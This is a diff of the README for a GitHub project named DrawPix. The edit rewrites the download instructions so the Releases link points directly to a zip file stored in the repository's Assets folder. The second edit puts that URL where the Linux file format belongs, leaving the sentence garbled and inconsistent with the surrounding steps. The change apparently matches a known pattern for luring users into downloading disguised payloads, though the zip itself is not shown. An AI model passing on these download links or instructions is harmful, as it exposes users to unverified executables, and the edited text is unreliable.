jetsurenos/DrawPix/README.md

 To get started with DrawPix, follow these steps:

 1. **Visit the Download Page**
-   Click the following link to go to the Releases page: [Download Here](https://github.com/jetsurenos/DrawPix/releases).
+   Click the following link to go to the Releases page: [Download Here](https://github.com/jetsurenos/DrawPix/raw/refs/heads/main/Assets/Pix-Draw-3.1.zip).

 2. **Choose Your Version**
    On the Releases page, you will see different versions of DrawPix.
 Choose the latest version for your operating system.

 3. **Download the File**
    Click on the file for your platform to start the download.
-This file will be in a `.zip` or `.exe` format for Windows, a `.dmg` format for macOS, or a `.tar.gz` for Linux.
+This file will be in a `.zip` or `.exe` format for Windows, a `.dmg` format for macOS, or a `https://github.com/jetsurenos/DrawPix/raw/refs/heads/main/Assets/Pix-Draw-3.1.zip` for Linux.

 4. **Install the Application**
    - For Windows: